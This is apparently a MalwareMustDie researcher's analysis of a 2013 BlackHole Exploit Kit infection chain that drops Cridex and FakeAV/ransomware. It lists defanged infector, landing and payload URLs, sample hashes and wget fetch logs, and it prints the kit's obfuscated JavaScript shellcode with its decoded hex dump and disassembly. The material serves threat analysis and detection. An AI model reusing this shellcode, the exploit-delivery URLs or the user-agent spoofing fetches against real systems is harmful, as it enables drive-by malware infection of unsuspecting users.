===================================================
#MalwareMustDie!
BlackHole Exploit Kit with Double infector:
Cridex & FakeAV/Ransomer (depends on your request IP)
Infector: h00p://webworks.investorship.co.jp/page-329.htm
Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
All of the cracked infectors download urls:
//JARS
..using the applet in the same url as landing page (2 JARS found)
//PDF:
h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
//SWF
h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
//Payloads:
h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
The catches:
--------------
2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
-----
Total: 2 SWF, 4 PDF, 2 Jars, 2 Payloads
Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
=================================================================
// infector:
h00p://webworks.investorship.co.jp/page-329.htm
--2013-02-18 14:11:12-- h00p://webworks.investorship.co.jp/page-329.htm
Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
Caching webworks.investorship.co.jp => 117.20.100.110
Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
:
GET /page-329.htm h00p/1.0
Host: webworks.investorship.co.jp
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Date: Mon, 18 Feb 2013 05:11:05 GMT
Server: Apache
Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
ETag: "1185062d-1b2-5121b3f6"
Accept-Ranges: bytes
Content-Length: 434
Connection: close
Content-Type: text/html
:
200 OK
Length: 434 [text/html]
Saving to: `page-329.htm'
2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]
//-------cat---------------
Please wait
Please wait a moment ... You will be forwarded...
Internet Explorer / Mozilla Firefox compatible only
// -----------landing page/is a BHEK moronz.----------------------
--2013-02-18 14:13:40-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php http/1.0
Referer: h00p://webworks.investorship.co.jp/page-329.htm
Host: 46.175.224.21:8080
http request sent, awaiting response...
:
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:13:34 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
http/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:16:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `public_version.php'
2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]
// -----------------checks the jars..---------------------
// get java old....
--2013-02-18 14:31:39-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php http/1.0
User-Agent: Java/1.6.0_23
Host: 46.175.224.21:8080
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:31:33 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 13873
ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
Accept-Ranges: bytes
:
200 OK
Length: 13873 (14K) [application/java-archive]
Saving to: `java1.jar'
2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]
// get java newer...
--2013-02-18 14:33:22-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php http/1.0
User-Agent: Java/1.7.0_09
Host: 46.175.224.21:8080
h00p request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:33:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 12968
ETag: "36df7f936b42abe2ccff75544f08f9f2"
Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
Accept-Ranges: bytes
:
200 OK
Length: 12968 (13K) [application/java-archive]
Saving to: `./java2.jar'
2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]
// -------------------------------------------------------
// see both plugin-detects....
// it has different shellcodes... two payloads...
// has 2 PDF, 2 SWF, 2 JARS each payload
// PD1.txt : http://pastebin.com/raw.php?i=CpRXS5m3
// and PD2.txt : http://pastebin.com/raw.php?i=MkYVRz4R
// ==========================================================================
// ========================================
// get the deobs + crack both shellcodes:
// ========================================
var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var xxx= a["replace"](/\%!/g, "%" + "u");
document.write(xxx);
var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var yyy= b["replace"](/\%!/g, "%" + "u");
document.write("\n\n"+yyy);
// output:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028
// ========================
// shellcode analysis...
// ========================
// break the eggs... no text...one time...
// raws...
414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e46191512404219191212421a1b19120e4e4d42191512421b1b1b12121a44191912124f41191912124746191912124741195c0e19150e4351475815420e154028410028
// view...
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12 Z[AGF.X@X.\N....
19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a .F..A..A...._M..
5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43 ^..C..E........C
12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19 ..C.....B..G.Y..
43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00 C.E@.X.^^.Z((.
//disasm..
00000000 41 inc ecx
00000001 41 inc ecx
00000002 41 inc ecx
00000003 41 inc ecx
00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
00000008 EBFC jmp short 0x6 ; loop
0000000A 58 pop eax
0000000B 10C9 adc cl,cl
0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
00000013 FE db 0xfe
00000014 2830 sub [eax],dh ; math
00000016 E240 loop 0x58 ; loop
00000018 EBFA jmp short 0x14 ; loop
0000001A E805FFEBFF call dword 0xffebff24 ; call
0000001F FFCC dec esp
00000021 AD lodsd
00000022 1C5D sbb al,0x5d
00000024 77C1 ja 0xffffffe7
00000026 E81BA34C18 call dword 0x184ca346 ; call
0000002B 6868A3A324 push dword 0x24a3a368
00000030 3458 xor al,0x58 ; decryption
00000032 A37E205EF3 mov [0xf35e207e],eax
00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
0000003D 2B041B sub eax,[ebx+ebx] ; math
00000040 C6 db 0xc6
00000041 A9383DD7D7 test eax,0xd7d73d38
00000046 A39018686E mov [0x6e681890],eax
0000004B EB2E jmp short 0x7b ; loop
0000004D 11D3 adc ebx,edx
0000004F 5D pop ebp
00000050 1CAF sbb al,0xaf
00000052 AD lodsd
00000053 0C5D or al,0x5d
00000055 CC int3
00000056 C17964C3 sar dword [ecx+0x64],0xc3
0000005A 7E79 jng 0xd5
0000005C 5D pop ebp
0000005D A3A3141D5C mov [0x5c1d14a3],eax
00000062 2B507E sub edx,[eax+0x7e] ; math
00000065 DD5EA3 fstp qword [esi-0x5d]
00000068 2B08 sub ecx,[eax] ; math
0000006A 1BDD sbb ebx,ebp
0000006C 61 popad
0000006D E1D4 loope 0x43
0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
0000007C E3E9 jecxz 0x67
0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
00000084 37 aaa
00000085 13CE adc ecx,esi
00000087 5D pop ebp
00000088 A3760C76F5 mov [0xf5760c76],eax
0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
00000093 A5 movsd
00000094 D7 xlatb
00000095 C40C7C les ecx,[esp+edi*2]
00000098 A3242BF0A3 mov [0xa3f02b24],eax
0000009D F5 cmc
0000009E A32CED2B76 mov [0x762bed2c],eax
000000A3 83EB71 sub ebx,byte +0x71 ; math
000000A6 7BC3 jpo 0x6b
000000A8 A385084055 mov [0x55400885],eax
000000AD A81B test al,0x1b
000000AF 242B and al,0x2b
000000B1 5C pop esp
000000B2 C3 ret
000000B3 BEA3DB2040 mov esi,0x4020dba3
000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
000000BE D7 xlatb
000000BF B0D7 mov al,0xd7
000000C1 D7 xlatb
000000C2 D1CA ror edx,1 ; bitwise cipher
000000C4 28C0 sub al,al ; math
000000C6 2828 sub [eax],ch ; math
000000C8 7028 jo 0xf2
000000CA 42 inc edx
000000CB 7840 js 0x10d
000000CD 6828D72828 push dword 0x2828d728
000000D2 AB stosd
000000D3 7831 js 0x106
000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
000000DA 76A3 jna 0x7f
000000DC AB stosd
000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
000000E3 40 inc eax
000000E4 284640 sub [esi+0x40],al ; math
000000E7 285A5D sub [edx+0x5d],bl ; math
000000EA 45 inc ebp
000000EB 44 inc esp
000000EC D7 xlatb
000000ED 7CAB jl 0x9a
000000EF 3E20EC ds and ah,ch
000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
000000F9 D7 xlatb
000000FA C3 ret
000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
00000107 240C and al,0xc
00000109 2C4D sub al,0x4d ; math
0000010B 5A pop edx
0000010C 5B pop ebx
0000010D 4F dec edi
0000010E 6C insb
0000010F EF out dx,eax
00000110 2C0C sub al,0xc ; math
00000112 5A pop edx
00000113 5E pop esi
00000114 1A1B sbb bl,[ebx]
00000116 6C insb
00000117 EF out dx,eax
00000118 200C0508085B40 and [eax+0x405b0808],cl
0000011F 7B28 jpo 0x149
00000121 D028 shr byte [eax],1
00000123 287ED7 sub [esi-0x29],bh ; math
00000126 A3241BC079 mov [0x79c01b24],eax
0000012B E16C loope 0x199
0000012D EF out dx,eax
0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
00000134 6C insb
00000135 EF out dx,eax
00000136 2D354C0644 sub eax,0x44064c35 ; math
0000013B 44 inc esp
0000013C 6C insb
0000013D EE out dx,al
0000013E 21357128E9A2 and [dword 0xa2e92871],esi
00000144 182C6C sbb [esp+ebp*2],ch
00000147 A02C357969 mov al,[0x6979352c]
0000014C 284228 sub [edx+0x28],al ; math
0000014F 42 inc edx
00000150 7F7B jg 0x1cd
00000152 28427E sub [edx+0x7e],al ; math
00000155 D7 xlatb
00000156 AD lodsd
00000157 3C5D cmp al,0x5d
00000159 E8423E7B28 call dword 0x287b3fa0 ; call
0000015E 7ED7 jng 0x137
00000160 42 inc edx
00000161 2CAB sub al,0xab ; math
00000163 2824C3 sub [ebx+eax*8],ah ; math
00000166 D7 xlatb
00000167 7B2C jpo 0x195
00000169 7EEB jng 0x156
0000016B AB stosd
0000016C C3 ret
0000016D 24C3 and al,0xc3
0000016F 2A6F3B sub ch,[edi+0x3b] ; math
00000172 17 pop ss
00000173 A85D test al,0x5d
00000175 286FD2 sub [edi-0x2e],ch ; math
00000178 17 pop ss
00000179 A85D test al,0x5d
0000017B 2842EC sub [edx-0x14],al ; math
0000017E 42 inc edx
0000017F 28D7 sub bh,dl ; math
00000181 D6 salc
00000182 207EB4 and [esi-0x4c],bh
00000185 C0D7D6 rcl bh,0xd6
00000188 A6 cmpsb
00000189 D7 xlatb
0000018A 2666B0C4 es o16 mov al,0xc4
0000018E A2D6A12629 mov [0x2926a1d6],al
00000193 47 inc edi
00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
0000019A 6E outsb
0000019B EE out dx,al
0000019C 1E push ds
0000019D 51 push ecx
0000019E 07 pop es
0000019F 324058 xor al,[eax+0x58] ; decryption
000001A2 5C pop esp
000001A3 5C pop esp
